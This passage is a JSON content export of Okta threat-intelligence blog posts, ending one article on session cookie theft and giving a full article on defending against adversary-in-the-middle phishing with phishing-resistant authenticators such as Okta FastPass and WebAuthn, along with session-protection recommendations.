remains.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Strongly consider updating incident response playbooks to quickly invalidate active sessions any time a malware infection is detected on an endpoint. Given the prevalence of infostealers in commodity malware campaigns – and considering the relatively minor impact to a user when a session is invalidated – we view this as a pragmatic precaution.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators have several tools available for invalidating a session cookie, which in turn invalidates the session. They can clear a user’s sessions in the admin console (People > Select Person > More Actions > Clear User Sessions), via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/sessions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/workflows-main.htm#:~:text=Workflows%20is%20an%20interface%2Ddriven,third%2Dparty%20apps%20and%20functions.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta admins can only invalidate IdP sessions and the sessions of third-party app providers that support \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Apps/Apps_Single_Logout.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single Log Out\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" as part of their integration with Okta. Ask your SaaS providers about APIs or other features that help alert on a change in user context.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - March 8, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - August 9, 2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Article Published\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-11-05T01:30:04.958Z","secAuthor":[{"id":"2d0612d0-ea24-5a48-bed3-797e6306eea4","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1uHU5vrZGhUcNFNAzgylU2/e92b96b2d85e5fb3c5da8a2c1695ddc9/md_profile.png"},"name":"Moussa Diallo","jobTitle":"Sr Manager, Identity Threat Research","slug":"moussa-diallo","node_locale":"en"},{"id":"94fa25fb-5f59-5711-92cc-f79d533ee5e2","bio":{"bio":"Tim Peel leads Cyber Threat Research within Okta's cyber defence team.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3VRUhNsn36rqnvpTCbIgnM/c7b494d1e58fd50e1495da6876a8a450/TP_profile_photo.jpg"},"name":"Tim Peel","jobTitle":"Director, Cyber Threat Research","slug":"tim-peel","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/phishingasaservice","id":"48da25c6-a84e-56a8-9b11-c05714c4742c","title":"Keeping Phishing Adversaries Out of the Middle","date":"2023-05-12T06:41:26+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence frequently observes the use of Adversary-in-the-Middle (AiTM) phishing proxies in high-volume, non-targeted attacks against users of corporate email services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Real-time phishing proxies have been used in red team activity and targeted attacks since at least 2017. Microsoft Threat Intelligence Center (MSTIC) \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"observed campaigns\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in July 2022 of far higher volume, with 10,000 Microsoft 365 customers targeted in one campaign alone. MSTIC also observed that accounts compromised in these attacks were being abused for Business Email Compromise (payment fraud).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Since February 2023, Okta has observed AiTM campaigns targeting Microsoft 365 at similar, if not higher scale. Our visibility into these campaigns comes from customers that federate Microsoft 365 sign-ins to Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This higher frequency is largely driven by the availability of AiTM proxy infrastructure on an “as-a-service” basis by groups like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EvilProxy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloudsek.com/threatintelligence/sophisticated-phishing-toolkit-dubbed-nakedpages-for-sale-on-cybercrime-forums\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NakedPages\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \\\"Phishing as a service\\\" platforms lease access to the infrastructure, configuration, and phishing templates required to operate AiTM campaigns, providing a larger number of threat actors with access to advanced capabilities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is AiTM Phishing?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an adversary-in-the-middle phishing attack, targets are directed to a malicious website that is configured as a reverse proxy server. These “real-time” phishing sites relay requests between a targeted user and an impersonated web application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user is tricked into signing in to the legitimate web application via one of these malicious sites, the attacker can access the user’s credentials and the session token returned to the browser.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2d4dHjd8BPMxGrwgNtbi2K\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Users cannot authenticate via attacker-controlled proxies if they use phishing-resistant forms of authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine offers a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"choice of authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that meet the NIST definition for phishing resistance:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (including support for both platform authenticators built into modern devices and roaming authenticators such as security keys).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Verify FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/smart-card-authenticator.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Smart Cards\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why FastPass is Your Best Bet Against Phishing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators of Okta orgs can enrol users in a broad range of authenticators, each of which offer varied levels of assurance. Given the scale at which AiTM campaigns now operate, Okta Verify FastPass stacks up as the most easily deployed and feature-rich defense, given its unique ability to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detect and prevent AitM phishing campaigns and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"surface these events in Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for further investigation and remediation\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Collect \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/el-device-attributes.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"device signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on both managed and unmanaged devices for use in policy evaluation and post-event analysis\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Probe for device signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" every time a user requests a new application during a session.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Offer a consistent user experience on all OS/browser platforms\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constrain credentials to a single device.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Let’s go through each in detail.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Device Assurance \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass is more than just a certificate-based authenticator.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The FastPass agent also enables policies that can allow or deny access to resources based on whether a device is managed, and whether a managed device exhibits a secure posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That capability also extends beyond managed devices. FastPass now collects a range of device \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/el-device-attributes.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on any device - managed or otherwise - to provide a baseline view of device posture (OS version, jailbreak status etc). This makes FastPass an ideal authenticator for the “extended enterprise\\\". Admins can easily provide temporary access to specific apps and data to contractors and partners, without requiring them to sign in from devices the organization manages or controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Continuous Evaluation of Device Context\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Traditionally, device context has been most relevant when evaluated at sign-in. Attacks that abuse a valid session token (typically stolen via infostealer malware or AiTM phishing) can bypass these protections. FastPass offers the opportunity to probe for device context more frequently, enabling workflows that identify and revoke stolen sessions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Server-side Detection of AiTM Phishing Attempts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While both FIDO2 WebAuthn and Okta Verify FastPass can prevent AiTM phishing, the latter also offers detection opportunities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A failed origin check during an attempt to sign-in using FastPass can be observed server-side. When such an attempt is observed, the Okta service generates a System Log event. This provides security operations teams a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"high-confidence signal\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that users are under attack. This \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=_lt-p3tt_zo\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"live demo\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" shows how powerful that is in detection and response scenarios.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why does FastPass offer this detection, but FIDO2 WebAuthn doesn’t? It comes down to the intended design of each authenticator. The designers of FIDO2 WebAuthn optimized for protecting both the security and the privacy of users. This involves trade-offs: some browsers, for example, allow a user to withhold information about an enrolled authenticator to prevent a user being tracked across multiple websites.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The designers of Okta FastPass, on the other hand, optimized for user security, user experience and ease of administration.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Usability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Usability is an overlooked aspect of security. Unfortunately, the authentication experience most users are most familiar with today (passwords, SMS etc) doesn't always offer the highest assurance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once enrolled, Okta FastPass and FIDO2 WebAuthn authenticators offer dramatically improved user experiences over passwords and OTPs. The process of signing in can be up to 50%-75% faster, depending on how many factors are required in policy. Okta FastPass can satisfy both a possession (device) and an inherence (biometric) factor in one gesture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Again, there are subtle differences between the usability of each phishing-resistant authenticator. The experience of WebAuthn varies by browser and by whether the credential was enrolled in single-device or multi-device mode, and much of this nuance isn't obvious to users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass, by contrast, is optimized for a consistent user experience in any browser and on any device (Android, iOS, MacOS and Windows).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Device-Bound Credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a personal or consumer context, PassKeys (discoverable WebAuthn credentials) promise to dramatically accelerate the journey to passwordless authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, multi-device credentials present some interesting challenges in an enterprise context. Where previously a platform-based WebAuthn credential was device-bound, they can now be transferred from a managed device to an unmanaged device using iCloud, AirDrop or alternative services hosted by Google or Microsoft.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This additional attack surface can materially degrade the assurance a credential provides. Consider a scenario in which admins enforce phishing resistant authenticators for access to sensitive applications and data: there is no guarantee that a user will apply the same requirement for access to their personal Apple, Google or Microsoft account. The path of least resistance for an attacker may be to phish a user for access to their personal accounts, to then obtain a credential that could potentially be used to unlock access to enterprise apps. So organizations using PassKeys have to accept the residual risk posed by a compromised personal cloud account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass, by contrast, binds credentials to a device. Administrators can also write policies for differentiated levels of access based on whether the credential was hardware-protected (stored in a Trusted Platform Module) versus stored in software.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass and WebAuthn offer dramatically higher assurance than alternative forms of authentication. Given the lower bar for adversaries to conduct session-stealing phishing campaigns, we recommend enrolment policies that require Okta Verify and WebAuthn, and authentication policies that enforce phishing resistance at every opportunity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1wzkmhJl9IU8I1trYX35uf\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Beyond the immediate risks posed by AiTM phishing, we also recommend taking a holistic approach to managing the risk posed by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hijacked sessions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply endpoint protection software to protect devices from malware that extracts session cookies from the user’s browser\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with endpoint detection providers to deny authentication requests from devices exhibiting poor security hygiene\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set maximum and idle application session duration according to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST guidelines\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set reauthentication frequency to “every time” for access to sensitive applications\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny requests from anonymizing proxies, from ASNs with a poor reputation or from locations where you don’t expect users to authenticate from. These requests can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/network/define-asn-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blocked pre-authentication using Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/10/human-factor-phishing-resistance\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. Make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect administrative sessions: Take a \\\"Zero Standing Privileges\\\" approach to administrative access. Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles. Apply ASN and IP Session Binding (from Settings > Features) to all administrative apps to prevent the replay of stolen administrative sessions. Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under Settings > Features) to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Talk to your SaaS partners about support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession, Continuous Access Evaluation Profile (CAEP) and Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - March 8, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - May 12, 2023\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Article Published\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-09-16T19:55:25.636Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
